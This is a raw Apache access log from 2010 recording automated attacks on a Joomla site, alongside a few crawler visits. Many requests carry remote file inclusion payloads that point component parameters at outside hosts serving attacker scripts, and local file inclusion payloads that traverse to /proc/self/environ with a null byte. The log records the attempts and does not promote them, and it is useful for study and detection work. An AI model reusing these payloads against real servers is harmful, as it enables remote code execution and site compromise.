94.136.63.119 - - [02/Jul/2010:08:05:13 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:08:05:13 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:08:07:41 -0700] "GET /logs/access_100218.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:08:07:42 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:08:07:42 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
203.147.62.92 - - [02/Jul/2010:08:07:54 -0700] "GET /logs/access_100204.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:08:10:35 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
94.136.63.119 - - [02/Jul/2010:08:10:35 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.stormofdarkness.com/testing/test.pdf? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.elfagr.net"
93.158.149.32 - - [02/Jul/2010:08:15:53 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
125.164.251.161 - - [02/Jul/2010:08:20:16 -0700] "GET /logs/ HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "www.elfagr.net"
125.164.251.161 - - [02/Jul/2010:08:20:18 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "www.elfagr.net"
125.164.251.161 - - [02/Jul/2010:08:20:21 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:08:32:44 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_phttp://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:08:32:54 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_phttp://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
125.164.251.161 - - [02/Jul/2010:08:35:25 -0700] "GET /logs/access_100701.log HTTP/1.1" 200 1961129 "http://www.elfagr.net/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "www.elfagr.net"
187.45.193.143 - - [02/Jul/2010:08:43:17 -0700] "GET /logs/access.log/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
187.45.193.143 - - [02/Jul/2010:08:43:28 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
187.45.193.143 - - [02/Jul/2010:08:43:18 -0700] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
66.235.124.55 - - [02/Jul/2010:08:43:49 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.elfagr.net"
66.235.124.55 - - [02/Jul/2010:08:43:50 -0700] "GET /logs/access_100211.log HTTP/1.1" 200 390652 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.elfagr.net"
187.45.193.143 - - [02/Jul/2010:08:49:48 -0700] "GET /logs/access_100204.log/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
202.60.234.22 - - [02/Jul/2010:08:58:14 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
202.60.234.22 - - [02/Jul/2010:08:58:26 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:08:59:56 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:08:59:47 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
67.195.111.171 - - [02/Jul/2010:09:00:09 -0700] "GET / HTTP/1.0" 200 1449 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
68.232.180.132 - - [02/Jul/2010:09:04:49 -0700] "GET /logs/access_100114.log//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [02/Jul/2010:09:04:59 -0700] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [02/Jul/2010:09:04:49 -0700] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [02/Jul/2010:09:05:01 -0700] "GET /logs/access_100114.log//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [02/Jul/2010:09:04:50 -0700] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [02/Jul/2010:09:04:50 -0700] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [02/Jul/2010:09:05:27 -0700] "GET /logs/access_100121.log//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [02/Jul/2010:09:05:19 -0700] "GET /logs/access_100121.log//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
66.135.41.16 - - [02/Jul/2010:09:05:48 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [02/Jul/2010:09:05:48 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:09:06:16 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:09:06:06 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
68.232.180.132 - - [02/Jul/2010:09:06:28 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [02/Jul/2010:09:06:17 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [02/Jul/2010:09:06:28 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [02/Jul/2010:09:06:18 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:09:08:30 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:09:08:30 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
67.195.111.171 - - [02/Jul/2010:09:09:18 -0700] "GET /index_files/ HTTP/1.0" 200 7672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
114.141.196.221 - - [02/Jul/2010:09:09:25 -0700] "GET /logs/access_100114.log//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
114.141.196.221 - - [02/Jul/2010:09:09:25 -0700] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
114.141.196.221 - - [02/Jul/2010:09:09:26 -0700] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
114.141.196.221 - - [02/Jul/2010:09:10:09 -0700] "GET /logs/access_100121.log//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
116.23.31.67 - - [02/Jul/2010:09:21:19 -0700] "GET / HTTP/1.0" 200 1449 "http://www.elfagr.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.elfagr.net"
151.1.253.1 - - [02/Jul/2010:09:34:06 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://indoteam.fileave.com/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
151.1.253.1 - - [02/Jul/2010:09:34:06 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://indoteam.fileave.com/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
151.1.253.1 - - [02/Jul/2010:09:34:07 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://indoteam.fileave.com/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
151.1.253.1 - - [02/Jul/2010:09:34:07 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://indoteam.fileave.com/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
211.206.120.196 - - [02/Jul/2010:09:34:33 -0700] "GET /logs/access.log%20%20//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
211.206.120.196 - - [02/Jul/2010:09:34:33 -0700] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4804 "-" "rk q kangen" "www.elfagr.net"
211.206.120.196 - - [02/Jul/2010:09:34:33 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:09:34:40 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:09:34:41 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
66.71.245.122 - - [02/Jul/2010:09:37:55 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
66.71.245.122 - - [02/Jul/2010:09:38:05 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
66.71.245.122 - - [02/Jul/2010:09:38:08 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
66.71.245.122 - - [02/Jul/2010:09:38:08 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:09:47:06 -0700] "GET /logs/access_091105.log//registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:09:47:17 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:09:47:18 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:09:47:25 -0700] "GET /logs/access_091105.log//registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:09:47:15 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:09:47:16 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:09:47:37 -0700] "GET /logs/access_091112.log//registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [02/Jul/2010:09:47:33 -0700] "GET /logs/access_091112.log//registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
193.231.187.33 - - [02/Jul/2010:09:52:11 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
193.231.187.33 - - [02/Jul/2010:09:52:02 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.142.75.205 - - [02/Jul/2010:09:59:16 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
174.142.75.205 - - [02/Jul/2010:09:59:06 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
69.39.100.24 - - [02/Jul/2010:10:21:21 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
69.39.100.24 - - [02/Jul/2010:10:21:31 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
207.58.162.113 - - [02/Jul/2010:10:22:48 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
207.58.162.113 - - [02/Jul/2010:10:22:38 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
69.39.100.24 - - [02/Jul/2010:10:26:06 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ebusinesslendingllc.com/data/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
121.78.118.123 - - [02/Jul/2010:10:27:49 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
121.78.118.123 - - [02/Jul/2010:10:28:00 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
69.39.100.24 - - [02/Jul/2010:10:31:45 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ebusinesslendingllc.com/data/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
69.39.100.24 - - [02/Jul/2010:10:31:56 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.ebusinesslendingllc.com/data/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
93.189.147.53 - - [02/Jul/2010:10:47:42 -0700] "GET /logs/access_100225.log HTTP/1.0" 200 875724 "http://www.elfagr.net/logs/access_100225.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)" "www.elfagr.net"
93.158.149.32 - - [02/Jul/2010:11:02:54 -0700] "GET / HTTP/1.1" 200 1465 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
76.251.212.161 - - [02/Jul/2010:11:03:55 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://fatony.110mb.com/ident1.txt HTTP/1.1" 200 1466 "-" "libwww-perl/5.825" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:11:13:26 -0700] "GET /logs/access.log/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:11:13:26 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:11:13:36 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:11:15:17 -0700] "GET /logs/access.log%20%20/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:11:15:07 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:11:15:17 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:11:18:45 -0700] "GET /index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:11:18:45 -0700] "GET /logs/access.log%20%20//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:11:18:34 -0700] "GET /logs//index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
67.195.111.171 - - [02/Jul/2010:11:20:09 -0700] "GET /test/?S=A HTTP/1.0" 200 644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
76.251.212.161 - - [02/Jul/2010:11:21:32 -0700] "GET /logs/access_091217.log////?_SERVER[DOCUMENT_ROOT]=http://fatony.110mb.com/ident1.txt HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.elfagr.net"
76.251.212.161 - - [02/Jul/2010:11:21:32 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://fatony.110mb.com/ident1.txt HTTP/1.1" 200 1466 "-" "libwww-perl/5.825" "www.elfagr.net"
76.251.212.161 - - [02/Jul/2010:11:21:33 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://fatony.110mb.com/ident1.txt HTTP/1.1" 200 4806 "-" "libwww-perl/5.825" "www.elfagr.net"
207.58.162.113 - - [02/Jul/2010:11:26:36 -0700] "GET /logs/index.php?option=com_preventive&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
207.58.162.113 - - [02/Jul/2010:11:26:36 -0700] "GET /index.php?option=com_preventive&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
83.168.244.15 - - [02/Jul/2010:11:27:29 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
83.168.244.15 - - [02/Jul/2010:11:27:40 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
